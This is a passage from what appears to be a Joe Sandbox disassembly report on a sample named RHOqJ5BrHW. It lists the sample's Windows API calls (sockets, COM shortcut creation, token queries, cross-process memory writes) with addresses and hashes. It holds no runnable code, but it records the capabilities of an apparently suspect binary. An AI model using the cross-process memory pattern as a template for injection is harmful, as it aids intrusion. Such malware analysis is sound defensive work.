                                    • Instruction Fuzzy Hash: DB21D531D042559AEF15EBB8AC52FEA33ACEF4A3A0F10446DF045D71C1EB60D9858A67
                                    APIs
                                      • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009D8BD3
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8BE2
                                    • connect.WSOCK32(00000000,?,00000010), ref: 009D8BFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLastconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 3701255441-0
                                    • Opcode ID: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                    • Instruction ID: 7c4b292ce7a3bce6c5dfa2f36f78a63af232fafa12769bda1bdb5b94bebaa562
                                    • Opcode Fuzzy Hash: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                    • Instruction Fuzzy Hash: 39218172640114AFCB10EFA8CC55F7E77ADEF88710F04845AF95697392CB74E8028761
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 009D8441
                                    • GetForegroundWindow.USER32 ref: 009D8458
                                    • GetDC.USER32(00000000), ref: 009D8494
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 009D84A0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 009D84DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                    • Instruction ID: 4346595cb9496d090c06d284934debf24a9faf906dc952b5c034e7057b91f8d6
                                    • Opcode Fuzzy Hash: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                    • Instruction Fuzzy Hash: 97215176A00204AFD700EFA5D985BAEBBE5EF88301F04C479F85997352DB70AD41CB60
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                    • SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                    • BeginPath.GDI32(?), ref: 0099B009
                                    • SelectObject.GDI32(?,00000000), ref: 0099B033
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                    • Instruction ID: 0407fee56f97240af4c0c4db4f2ee41a9ddbd4750d3aa1ad6e92111dd11bd63d
                                    • Opcode Fuzzy Hash: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                    • Instruction Fuzzy Hash: E521AFB9800309EFDB10DFD9ED48BAABB6CFB52355F15431AF525920A0D3B58883CB90
                                    APIs
                                    • __calloc_crt.LIBCMT ref: 009A21A9
                                    • CreateThread.KERNEL32(?,?,009A22DF,00000000,?,?), ref: 009A21ED
                                    • GetLastError.KERNEL32 ref: 009A21F7
                                    • _free.LIBCMT ref: 009A2200
                                    • __dosmaperr.LIBCMT ref: 009A220B
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                    • String ID:
                                    • API String ID: 2664167353-0
                                    • Opcode ID: 841335d0bcba3bf33a47b96b72177c6d2d8f9e853a2bf228162c3c7669c894b1
                                    • Instruction ID: cc628d652ebea11f75c40e0e20232923a32f54cea11cdaa1f454e2e78ed9aec6
                                    • Opcode Fuzzy Hash: 841335d0bcba3bf33a47b96b72177c6d2d8f9e853a2bf228162c3c7669c894b1
                                    • Instruction Fuzzy Hash: B211C8331083066FDB15AFE9DC42F6B7BA8EF87770B100429FD2486151DB71D81286E1
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                    • GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                    • GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                    • RtlAllocateHeap.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 883493501-0
                                    • Opcode ID: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                    • Instruction ID: e13ffeb58ba7f76e61c471c4d7c33f12bfc0efa357fb45ba224b6d745f1a176c
                                    • Opcode Fuzzy Hash: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                    • Instruction Fuzzy Hash: CE013C72210208BFDB108FE9DD48DAB7FADEF8A765B100529F945C3260DA71DC82CB61
                                    APIs
                                    • CLSIDFromProgID.OLE32 ref: 009B9ADC
                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                    • CLSIDFromString.OLE32(?,?), ref: 009B9B21
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                    • Instruction ID: ef17fe7bae4682569559db4b1774bdb429d49baf704eee42b95cd15255079f72
                                    • Opcode Fuzzy Hash: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                    • Instruction Fuzzy Hash: EC018F7A62022CBFDB108FD4EE44BAA7AEDEF44361F148028FA05D2210D770DD469BA0
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A74
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A82
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A8A
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A94
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                    • Instruction ID: 90072e661afcd169f612c522bb6e42a8a8329af3c2936b86e3f45d09f10f7d9b
                                    • Opcode Fuzzy Hash: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                    • Instruction Fuzzy Hash: 4E010536C0461DABDF00EFE5E888AEDFB78FB18711F000559E502B2150DB3496528BA2
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009BAADA
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAE4
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAF3
                                    • RtlAllocateHeap.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAFA
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAB10
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
                                    • Instruction ID: 7ab4e8404768c1693cf2ed509aeb530c2fe054de047bc889e14288a7babae9fd
                                    • Opcode Fuzzy Hash: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
                                    • Instruction Fuzzy Hash: 50F062762102186FEB114FE4EC88EA73B6DFF45765F000129FA56C7190CB609C43CB61
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
                                    • RtlAllocateHeap.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
                                    • Instruction ID: e04f832c80cf6c570a17e871c676206b97bafea3b2b0b00c843a27a44d279736
                                    • Opcode Fuzzy Hash: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
                                    • Instruction Fuzzy Hash: C3F04F762002086FEB119FE4AD89EAB3BADFF49765F400519FA45C7190DB609C43CA71
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 009BEC94
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 009BECAB
                                    • MessageBeep.USER32(00000000), ref: 009BECC3
                                    • KillTimer.USER32(?,0000040A), ref: 009BECDF
                                    • EndDialog.USER32(?,00000001), ref: 009BECF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
                                    • Instruction ID: a435b3ded0ff436e806811ded0d6538ddddf1a69b7de93167d13ff3d428be6d0
                                    • Opcode Fuzzy Hash: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
                                    • Instruction Fuzzy Hash: 47018131500708ABEB249B90DF4EBD67BBCFB00715F000959B582A14E0DBF4AA9ACB80
                                    APIs
                                    • EndPath.GDI32(?), ref: 0099B0BA
                                    • StrokeAndFillPath.GDI32(?,?,009FE680,00000000,?,?,?), ref: 0099B0D6
                                    • SelectObject.GDI32(?,00000000), ref: 0099B0E9
                                    • DeleteObject.GDI32 ref: 0099B0FC
                                    • StrokePath.GDI32(?), ref: 0099B117
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
                                    • Instruction ID: 20bc604fb8896cd1951e05d913ad87d00d1ea34910ca3963c8ba4373df030874
                                    • Opcode Fuzzy Hash: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
                                    • Instruction Fuzzy Hash: E6F0F639004208AFCB21DFE9ED08B647F64A742366F088314F429440F0C7368997CF50
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 009CF2DA
                                    • CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CF2F2
                                    • CoUninitialize.OLE32 ref: 009CF555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize
                                    • String ID: .lnk
                                    • API String ID: 948891078-24824748
                                    • Opcode ID: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                    • Instruction ID: 44550724a8a282995f0b44f0b7223810053059eab5fce45703cc1484c62bd54f
                                    • Opcode Fuzzy Hash: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                    • Instruction Fuzzy Hash: E1A10BB2504201AFD700EFA4C891EABB7ECEFD8714F00495DF55597292EB70EA49CB62
                                    APIs
                                      • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                    • CoInitialize.OLE32(00000000), ref: 009CE85D
                                    • CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CE876
                                    • CoUninitialize.OLE32 ref: 009CE893
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
                                    • Instruction ID: 33dc0cc82f3d81d2c9d4f53102552eba920ce5463262180773fa89d5a3a60053
                                    • Opcode Fuzzy Hash: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
                                    • Instruction Fuzzy Hash: 95A13775A043019FCB14EF14C884E2ABBE9BF89710F14895DF9969B3A1CB31ED45CB92
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 009A32ED
                                      • Part of subcall function 009AE0D0: __87except.LIBCMT ref: 009AE10B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
                                    • Instruction ID: 8b7b720a297336b87b1cf52b9a3dba03b9e344df076b7d817024fd970d2d2ba6
                                    • Opcode Fuzzy Hash: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
                                    • Instruction Fuzzy Hash: 2F514B31A0C20296CF15B758C94137A3B9CDB83750F60CD68F8E5822A9DF388D959BC6
                                    APIs
                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00A1DC50,?,0000000F,0000000C,00000016,00A1DC50,?), ref: 009C4645
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009C46C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper$__itow__swprintf
                                    • String ID: REMOVE$THIS
                                    • API String ID: 3797816924-776492005
                                    • Opcode ID: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                    • Instruction ID: bd74997649c60f59627754e133547cc357aad71553b759e142d449eb526c8c77
                                    • Opcode Fuzzy Hash: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                    • Instruction Fuzzy Hash: CB417C75A002099FCF05EFA4C891FAEB7B8BF89304F148459E916AB392DB34DD41CB51
                                    APIs
                                      • Part of subcall function 009C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC08,?,?,00000034,00000800,?,00000034), ref: 009C4335
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009BC1D3
                                      • Part of subcall function 009C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 009C4300
                                      • Part of subcall function 009C422F: GetWindowThreadProcessId.USER32(?,?), ref: 009C425A
                                      • Part of subcall function 009C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C426A
                                      • Part of subcall function 009C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C4280
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC240
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC28D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                    • Instruction ID: f58b0cd348ca3d6b0e4f74993307de0878b128c10d87af5a307da5c48124e071
                                    • Opcode Fuzzy Hash: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                    • Instruction Fuzzy Hash: 25412C72A0021CAFDB11DFA4CD92FEEB7B8AF49710F004099FA55B7181DA71AE45CB61
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A1DC00,00000000,?,?,?,?), ref: 009EA6D8
                                    • GetWindowLongW.USER32 ref: 009EA6F5
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009EA705
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
